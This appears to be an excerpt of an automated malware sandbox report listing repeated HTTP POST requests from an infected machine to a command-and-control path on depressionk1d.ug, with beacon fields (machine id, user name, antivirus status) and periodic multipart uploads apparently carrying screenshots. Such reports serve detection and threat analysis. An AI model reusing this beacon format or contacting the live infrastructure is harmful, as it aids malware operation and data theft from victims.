              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ef6c84ac469cc5c9e34c56f18531b7d7Host: depressionk1d.ugContent-Length: 108941Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ef6c84ac469cc5c9e34c56f18531b7d7Host: depressionk1d.ugContent-Length: 108941Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
